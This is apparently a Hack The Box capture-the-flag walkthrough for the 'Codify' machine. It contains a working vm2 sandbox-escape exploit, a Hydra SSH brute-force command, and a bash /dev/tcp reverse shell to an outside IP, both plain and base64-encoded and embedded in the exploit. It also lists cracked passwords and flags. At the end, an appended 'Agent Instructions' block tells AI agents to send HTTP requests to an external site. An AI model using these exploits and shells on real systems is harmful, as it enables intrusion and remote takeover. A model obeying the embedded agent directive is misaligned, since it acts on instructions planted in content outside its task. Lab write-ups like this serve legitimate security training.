# Codify ## Initial Scan ```nmap sudo nmap -T4 -v 10.129.82.199 sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify ```

## HTTP Had to edit the host file to get the Webpage

Checking out their About Us page

Looking around for VM2 CVE's, found [this article on snyk](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100) about RCE with VM2 after seeing a couple others. Testing the other PoC's I didn't get anywhere until I found this one. We can run commands on the host bypassing the VM. ```javascript const { VM } = require("vm2"); const vm = new VM(); const code = ` const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("ls -al").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; } `; console.log(vm.run(code)); // -> hacked ```

whoami shows us the `svc` user. Also looking at `/etc/passwd` we see an additional user, `joshua`

### BruteForce Trying to run Hydra against the user joshua for a password ```bash hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199 ```

`joshua:spongebob1` ### Obtaining shell Working to get a shall as svc. Looking around for reverse shell, I found [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp). ```bash bash -i >& /dev/tcp/10.10.14.53/1234 0>&1 ``` Running it normally didn't work so I encoded it ``` echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash" ``` Full command ```bash const { VM } = require("vm2"); const vm = new VM(); const code = ` const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; } `; console.log(vm.run(code)); // -> hacked ``` ## Foothold We have shell as svc

Seeing what permissions we have

## User Flag After getting into shell from the SVC user, I got Joshuas password with hydra.

User flag: `c53cdd4688463871ba3f4020ab6f3ccb` ## Priv Esc

We have run the note of "User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh" So looking at the shell file

Running that as root as get

Get [PSPY](https://github.com/DominicBreuker/pspy) Initiate another SSH session. Get pspy64 onto the target machine, run it, then run the `/opt/scripts/mysql-backup.sh` script

Root pass: `kljh12k3jhaskjh12kjh3`

Root flag: `4e43f866588b3b3433196af3cef8b768` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cybersec.th4ntis.com/hackthebox/walkthroughs/codify.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.